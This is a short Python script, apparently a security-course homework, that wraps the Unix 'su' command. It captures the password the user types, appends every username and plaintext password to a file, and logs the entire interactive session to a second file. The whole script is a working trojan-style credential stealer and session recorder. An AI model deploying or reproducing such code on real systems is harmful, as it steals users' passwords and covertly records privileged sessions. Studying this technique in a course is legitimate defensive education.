#!/usr/bin/env python

import sys
import pexpect
import getpass

def storeInput(string):
    f = open('/home/sl136/course/cs166/hw2/allInput.txt', 'a+')
    f.write(string)
    f.close()
    return string

if __name__ == '__main__':
    if(len(sys.argv) < 2):
        user = ""
    else:
        user = sys.argv[1]

    child = pexpect.spawn("su " + user)
    fout = file('/home/sl136/course/cs166/hw2/allInput.txt', 'a+')
    fout.write("\n\n=====================\n" + user + ": \n")
    child.logfile = fout

    child.expect(['Password:', pexpect.EOF])

    try:
        password = getpass.getpass()
    except:
        pass
    
    f = open('/home/sl136/course/cs166/hw2/usrpass.txt', 'a+')
    f.write(user + ": " + password + "\n")
    f.close()

    child.sendline(password)
    child.expect(['\n'])


    try:
        child.interact(chr(29))
    except:
        pass
    fout.close
    child.close(False)
